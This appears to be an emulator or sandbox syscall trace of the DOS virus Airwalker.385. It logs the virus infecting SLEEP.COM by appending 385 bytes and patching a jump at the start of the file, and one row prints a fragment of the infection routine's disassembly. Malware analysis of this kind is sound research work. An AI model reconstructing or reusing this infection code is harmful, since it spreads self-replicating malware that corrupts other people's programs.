Time | Syscall Op | PC | Syscall Name |
---|---|---|---|
2018-12-17T22:49:07.514428334Z | 26 | PC: 12ab3 | Set disk transfer address |
2018-12-17T22:49:07.516197668Z | 78 | PC: 12abf | Find first file |
2018-12-17T22:49:07.527356303Z | 61 | PC: 12afd | Open file (Filename = 'SLEEP.COM') |
2018-12-17T22:49:07.53514115Z | 63 | PC: 12b0b | Read file or device (Read 3 bytes on handle 5) |
2018-12-17T22:49:07.541988205Z | 66 | PC: 12b1e | Move file pointer |
2018-12-17T22:49:07.544274761Z | 44 | PC: 12b2b | Get time<br>`0x12b2b: xchg cl, ch`<br>`0x12b2d: add dx, cx`<br>`0x12b2f: mov word ptr [bp + 0x171], dx`<br>`0x12b33: xor word ptr [bp + 0x15c], 0x1717`<br>`0x12b39: xor byte ptr [bp + 0x15e], 0x19`<br>`0x12b3e: mov ah, 0x40`<br>`0x12b40: mov cx, 0x181`<br>`0x12b43: lea dx, word ptr [bp]`<br>`0x12b46: pushaw`<br>`0x12b47: jmp 0x12bf9`<br>`0x12b4a: pop ax`<br>`0x12b4b: jb 0x12b76`<br>`0x12b4d: sub ax, 3`<br>`0x12b50: push bx`<br>`0x12b51: mov bx, bp`<br>`0x12b53: mov word ptr cs:[bx + 1], ax`<br>`0x12b57: mov byte ptr [bx], 0xe9`<br>`0x12b5a: pop bx`<br>`0x12b5b: mov ax, 0x4200`<br>`0x12b5e: xor cx, cx` |
2018-12-17T22:49:07.547087336Z | 64 | PC: 12bff | Write file or device (Write 385 bytes on handle 5) |
2018-12-17T22:49:07.56287066Z | 66 | PC: 12b63 | Move file pointer |
2018-12-17T22:49:07.565365528Z | 64 | PC: 12b70 | Write file or device (Write 3 bytes on handle 5) |
2018-12-17T22:49:07.572778105Z | 62 | PC: 12b76 | Close file |
2018-12-17T22:49:07.58105212Z | 9 | PC: 12a47 | Display string (String= 'WARNING: You have just released the Airwalker.385 virus! ') |